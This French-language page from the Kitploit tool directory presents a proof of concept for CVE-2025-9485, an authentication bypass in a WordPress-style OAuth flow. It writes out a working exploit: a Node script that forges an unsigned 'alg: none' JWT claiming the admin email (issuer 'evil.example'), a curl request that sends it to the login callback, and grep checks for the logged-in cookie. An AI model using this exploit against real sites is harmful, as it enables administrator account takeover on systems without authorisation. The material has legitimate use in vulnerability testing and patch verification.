Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-9485 — Preuve de concept de l'exploit pour CVE-2025-9485 démontrant un contournement d'authentification via un JWT non signé (alg: none) dans un flux OAuth de type WordPress. Inclut des scripts de falsification de jeton et de déclenchement de rappel. | Kitploit
Outils/GitHubGitHub/jfriedli/cve-2025-9485
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentification
GitHubjfriedli/cve-2025-9485

CVE-2025-9485

Preuve de concept de l'exploit pour CVE-2025-9485 démontrant un contournement d'authentification via un JWT non signé (alg: none) dans un flux OAuth de type WordPress. Inclut des scripts de falsification de jeton et de déclenchement de rappel.

Voir le dépôt
il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit : Contournement d'authentification via JWT non signé (alg: none)

1) Forger un JWT non signé revendiquant l'e-mail administrateur

root@kitploit:~
TOKEN=$(node -e '
function b64u(s){
  return Buffer.from(s).toString("base64")
    .replace(/\+/g,"-")
    .replace(/\//g,"_")
    .replace(/=+$/,"")
}

const header = b64u(JSON.stringify({ alg: "none", typ: "JWT" }));

const now = Math.floor(Date.now()/1000);
const payload = b64u(JSON.stringify({
  iss: "https://evil.example",
  aud: "abc",
  sub: "admin-hijack",
  email: process.env.ADMIN_EMAIL,
  email_verified: "1",
  iat: now,
  exp: now + 3600
}));

console.log(header + "." + payload + ".");
')

echo "$TOKEN"

2) Déclencher le rappel d'authentification avec le forgé

id_token
root@kitploit:~
curl -i -A "Mozilla/5.0" \
  "$SITE/?code=DUMMY&id_token=$TOKEN&state=$STATE" \
  | tee /tmp/poc_headers.txt

3) Vérifier la réussite de l'authentification

root@kitploit:~
grep -i '^set-cookie: wordpress_logged_in' /tmp/poc_headers.txt
grep -i '^location:' /tmp/poc_headers.txt
Télécharger l’outil